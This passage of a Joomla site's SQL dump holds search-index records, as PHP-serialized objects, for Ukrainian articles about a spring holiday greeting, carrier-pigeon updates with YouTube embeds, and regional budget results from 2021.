show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:38:\"2505:iz-svyatom-vesni-krasi-ta-lyubovi\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:60:\"/index.php/8-novini-2/2505-iz-svyatom-vesni-krasi-ta-lyubovi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2505\";s:5:\"route\";s:91:\"index.php?option=com_content&view=article&id=2505:iz-svyatom-vesni-krasi-ta-lyubovi&catid=8\";s:5:\"title\";s:59:\"Із святом весни, краси та любові!\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-03-05 17:48:04\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-03-05 17:48:04\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4813,'index.php?option=com_content&view=article&id=2506','index.php?option=com_content&view=article&id=2506:poshtovi-golubi-projshlo-shche-10-dniv&catid=126','Поштові голуби, пройшло ще 10 днів- 14 березня і перший пробний політ..',' ','2021-03-14 08:49:30','af852d6927b17cb453f41f1393561f4d',1,1,1,'*','2021-03-14 06:40:07','0000-00-00 00:00:00','2021-03-14 06:40:07','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2506\";s:5:\"alias\";s:38:\"poshtovi-golubi-projshlo-shche-10-dniv\";s:7:\"summary\";s:297:\"	<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/VigWsKc8CLE\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-03-14 06:49:30\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:43:\"2506:poshtovi-golubi-projshlo-shche-10-dniv\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:70:\"/index.php/holuby/poshtovi/2506-poshtovi-golubi-projshlo-shche-10-dniv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2506\";s:5:\"route\";s:98:\"index.php?option=com_content&view=article&id=2506:poshtovi-golubi-projshlo-shche-10-dniv&catid=126\";s:5:\"title\";s:123:\"Поштові голуби, пройшло ще 10 днів- 14 березня і перший пробний політ..\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-03-14 06:40:07\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-03-14 06:40:07\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4814,'index.php?option=com_content&view=article&id=2507','index.php?option=com_content&view=article&id=2507:pershi-poshtovi-2021-roku-eksperiment-vijshov-na-finishnu-pryamu-21-bereznya-2021-roku-pershij-samostijnij-snidanok&catid=126','Перші поштові 2021 року- експеримент вийшов на фінішну пряму- 21 березня 2021 року перший самостійний сніданок.',' ','2021-03-21 10:23:45','dbc05ee3aa556d12602cbcbcd21e92cb',1,1,1,'*','2021-03-21 08:23:44','0000-00-00 00:00:00','2021-03-21 08:23:44','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2507\";s:5:\"alias\";s:115:\"pershi-poshtovi-2021-roku-eksperiment-vijshov-na-finishnu-pryamu-21-bereznya-2021-roku-pershij-samostijnij-snidanok\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/00zORoTUw_4\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-03-21 08:23:44\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:120:\"2507:pershi-poshtovi-2021-roku-eksperiment-vijshov-na-finishnu-pryamu-21-bereznya-2021-roku-pershij-samostijnij-snidanok\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:147:\"/index.php/holuby/poshtovi/2507-pershi-poshtovi-2021-roku-eksperiment-vijshov-na-finishnu-pryamu-21-bereznya-2021-roku-pershij-samostijnij-snidanok\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2507\";s:5:\"route\";s:175:\"index.php?option=com_content&view=article&id=2507:pershi-poshtovi-2021-roku-eksperiment-vijshov-na-finishnu-pryamu-21-bereznya-2021-roku-pershij-samostijnij-snidanok&catid=126\";s:5:\"title\";s:194:\"Перші поштові 2021 року- експеримент вийшов на фінішну пряму- 21 березня 2021 року перший самостійний сніданок.\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-03-21 08:23:44\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-03-21 08:23:44\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4837,'index.php?option=com_content&view=article&id=2508','index.php?option=com_content&view=article&id=2508:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2-misyatsi-2021-roku&catid=8','Результати за 3 місяці 2021 року',' За даними Департаменту фінансів Житмирської ОДА . ','2021-04-17 17:14:29','300d856c986063e2eff0fb35110a996f',1,1,1,'*','2021-03-21 08:49:35','0000-00-00 00:00:00','2021-03-21 08:49:35','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2508\";s:5:\"alias\";s:91:\"vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2-misyatsi-2021-roku\";s:7:\"summary\";s:338:\"	<p><span style=\"color: #28324E; font-family: Georgia; font-size: 15px;\">За даними Департаменту фінансів Житмирської ОДА</span>.<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/censor.jpg\"><img alt=\"\" class=\"fr-fir fr-dii\" src=\"https://malehus.in.ua/images/stories/censor.jpg\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-04-17 14:14:29\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s: